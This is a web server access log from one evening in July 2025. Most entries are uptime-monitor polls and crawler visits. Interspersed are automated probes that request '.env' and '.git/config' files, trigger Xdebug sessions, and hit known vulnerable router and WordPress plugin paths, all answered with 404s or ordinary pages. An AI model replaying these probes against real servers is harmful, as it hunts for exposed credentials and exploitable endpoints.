45.82.78.254 - - [01/Jul/2025:19:10:43 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
212.91.247.32 - - [01/Jul/2025:19:10:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.134.148.59 - - [01/Jul/2025:19:11:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.134.148.59 - - [01/Jul/2025:19:11:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:11:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:12:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:13:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [01/Jul/2025:19:14:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
204.76.203.206 - - [01/Jul/2025:19:14:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
3.134.148.59 - - [01/Jul/2025:19:14:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.134.148.59 - - [01/Jul/2025:19:14:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:14:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.134.148.59 - - [01/Jul/2025:19:15:44 +0200] "SSH-2.0-Go" 501 325 "-" "-"
79.124.58.198 - - [01/Jul/2025:19:15:49 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:15:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.134.148.59 - - [01/Jul/2025:19:16:12 +0200] "SSH-2.0-Go" 501 325 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:16:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.134.148.59 - - [01/Jul/2025:19:17:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.134.148.59 - - [01/Jul/2025:19:17:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:17:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:19:18:20 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
176.65.148.243 - - [01/Jul/2025:19:18:43 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:18:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:19:18:57 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
43.130.72.177 - - [01/Jul/2025:19:19:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [01/Jul/2025:19:19:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:19:20:48 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:20:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:21:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:19:22:26 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:22:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:19:23:29 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:23:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.227.108.141 - - [01/Jul/2025:19:24:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:24:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:19:25:31 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:25:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:19:26:02 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
159.89.233.95 - - [01/Jul/2025:19:26:12 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
159.89.233.95 - - [01/Jul/2025:19:26:13 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
79.124.58.198 - - [01/Jul/2025:19:26:16 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
204.76.203.206 - - [01/Jul/2025:19:26:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:26:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:27:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
108.165.153.6 - - [01/Jul/2025:19:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:28:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:29:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:30:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
108.165.153.6 - - [01/Jul/2025:19:31:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [01/Jul/2025:19:31:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:31:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.135.193.162 - - [01/Jul/2025:19:32:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
176.96.131.92 - - [01/Jul/2025:19:32:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
160.187.246.170 - - [01/Jul/2025:19:32:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.131.155.254 - - [01/Jul/2025:19:32:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:32:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [01/Jul/2025:19:33:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
79.124.58.198 - - [01/Jul/2025:19:33:40 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.131.155.254 - - [01/Jul/2025:19:33:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:19:33:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.247.32 - - [01/Jul/2025:19:33:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.135.193.162 - - [01/Jul/2025:19:34:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
204.76.203.219 - - [01/Jul/2025:19:34:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.83.206 - - [01/Jul/2025:19:34:32 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
196.251.83.206 - - [01/Jul/2025:19:34:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; MI 9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
95.214.53.84 - - [01/Jul/2025:19:34:52 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
196.251.83.206 - - [01/Jul/2025:19:34:53 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G950U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
176.65.148.183 - - [01/Jul/2025:19:34:53 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:34:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
108.165.153.6 - - [01/Jul/2025:19:35:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:35:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
196.251.83.206 - - [01/Jul/2025:19:35:59 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
34.140.32.240 - - [01/Jul/2025:19:36:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
204.76.203.219 - - [01/Jul/2025:19:36:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.83.206 - - [01/Jul/2025:19:36:20 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/67.0.3396.69 Mobile/16A366 Safari/604.1"
196.251.83.206 - - [01/Jul/2025:19:36:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23"
196.251.83.206 - - [01/Jul/2025:19:36:36 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)"
196.251.83.206 - - [01/Jul/2025:19:36:41 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.6.1000"
196.251.83.206 - - [01/Jul/2025:19:36:45 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-J327T1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36"
196.251.83.206 - - [01/Jul/2025:19:36:49 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:36:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [01/Jul/2025:19:37:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:37:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [01/Jul/2025:19:38:06 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
176.65.148.183 - - [01/Jul/2025:19:38:14 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:38:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:39:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [01/Jul/2025:19:39:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
176.65.148.183 - - [01/Jul/2025:19:40:09 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
45.131.155.254 - - [01/Jul/2025:19:40:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
176.65.148.183 - - [01/Jul/2025:19:40:12 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
45.131.155.254 - - [01/Jul/2025:19:40:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:40:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [01/Jul/2025:19:41:08 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
176.65.148.183 - - [01/Jul/2025:19:41:13 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:41:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [01/Jul/2025:19:42:08 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
108.165.153.6 - - [01/Jul/2025:19:42:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.148.183 - - [01/Jul/2025:19:42:21 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:42:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [01/Jul/2025:19:43:35 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:43:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.143.33.63 - - [01/Jul/2025:19:44:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:44:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.143.33.63 - - [01/Jul/2025:19:45:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.143.33.63 - - [01/Jul/2025:19:45:13 +0200] "SSH-2.0-Go" 501 325 "-" "-"
3.143.33.63 - - [01/Jul/2025:19:45:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.143.33.63 - - [01/Jul/2025:19:45:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.143.33.63 - - [01/Jul/2025:19:45:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:45:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.143.33.63 - - [01/Jul/2025:19:45:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.143.33.63 - - [01/Jul/2025:19:45:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
3.143.33.63 - - [01/Jul/2025:19:46:00 +0200] "SSH-2.0-Go" 501 325 "-" "-"
45.135.193.162 - - [01/Jul/2025:19:46:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:46:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:47:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
108.165.153.6 - - [01/Jul/2025:19:48:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:48:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [01/Jul/2025:19:48:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.6 - - [01/Jul/2025:19:49:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.6 - - [01/Jul/2025:19:49:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:49:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [01/Jul/2025:19:51:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [01/Jul/2025:19:51:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:51:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:52:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.82.78.254 - - [01/Jul/2025:19:53:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0"
45.135.193.162 - - [01/Jul/2025:19:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:19:53:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.138.3.40 - - [01/Jul/2025:19:54:53 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
62.138.3.40 - - [01/Jul/2025:19:54:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:19:54:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:55:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [01/Jul/2025:19:56:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
108.165.153.6 - - [01/Jul/2025:19:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:56:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [01/Jul/2025:19:57:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:57:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:19:58:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [01/Jul/2025:19:58:58 +0200] "POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15"
77.90.153.48 - - [01/Jul/2025:19:59:07 +0200] "GET /index.php/user/ HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
204.76.203.219 - - [01/Jul/2025:19:59:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:19:59:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [01/Jul/2025:20:00:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
